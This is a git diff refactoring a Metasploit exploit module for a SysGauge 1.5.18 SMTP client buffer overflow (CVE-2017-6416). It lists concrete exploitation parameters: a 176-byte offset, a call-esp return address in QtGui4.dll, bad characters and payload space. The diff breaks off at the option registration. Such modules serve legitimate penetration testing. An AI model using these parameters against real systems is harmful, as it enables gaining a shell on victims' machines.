diff --git a/modules/exploits/windows/smtp/sysgauge_client_bof.rb b/modules/exploits/windows/smtp/sysgauge_client_bof.rb index 5aa369df6acfa..f18ad3c87f3ff 100644 --- a/modules/exploits/windows/smtp/sysgauge_client_bof.rb +++ b/modules/exploits/windows/smtp/sysgauge_client_bof.rb @@ -8,44 +8,48 @@ class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking - def initialize() + def initialize(info = {}) super( - 'Name' => 'SysGauge SMTP Validation Buffer Overflow', - 'Description' => %q{ - This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 - via its SMTP server validation. The module sends a malicious response along in the - 220 service ready response and exploits the client, resulting in an unprivileged shell. - }, - 'Author' => [ - 'Chris Higgins', # msf Module -- @ch1gg1ns - 'Peter Baris' # Initial discovery and PoC - ], - 'License' => MSF_LICENSE, - 'References' => [ - [ 'CVE', '2017-6416' ], - [ 'EDB', '41479' ], - ], - 'DefaultOptions' => { - 'EXITFUNC' => 'thread' - }, - 'Payload' => { - 'Space' => 306, - 'BadChars' => "\x00\x0a\x0d\x20" - }, - 'Platform' => 'win', - 'Targets' => [ - [ - 'Windows Universal', - { - 'Offset' => 176, - 'Ret' => 0x6527635E # call esp # QtGui4.dll - } - ] - ], - 'Privileged' => false, - 'DisclosureDate' => 'Feb 28 2017', - 'DefaultTarget' => 0 + update_info( + info, + 'Name' => 'SysGauge SMTP Validation Buffer Overflow', + 'Description' => %q{ + This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 + via its SMTP server validation. The module sends a malicious response along in the + 220 service ready response and exploits the client, resulting in an unprivileged shell. + }, + 'Author' => [ + 'Chris Higgins', # msf Module -- @ch1gg1ns + 'Peter Baris' # Initial discovery and PoC + ], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'CVE', '2017-6416' ], + [ 'EDB', '41479' ], + ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread' + }, + 'Payload' => { + 'Space' => 306, + 'BadChars' => "\x00\x0a\x0d\x20" + }, + 'Platform' => 'win', + 'Targets' => [ + [ + 'Windows Universal', + { + 'Offset' => 176, + 'Ret' => 0x6527635E # call esp # QtGui4.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 28 2017', + 'DefaultTarget' => 0 ) + ) + register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),